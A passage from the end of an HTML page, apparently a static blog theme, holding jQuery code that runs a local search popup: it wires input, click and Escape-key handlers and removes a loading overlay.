            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
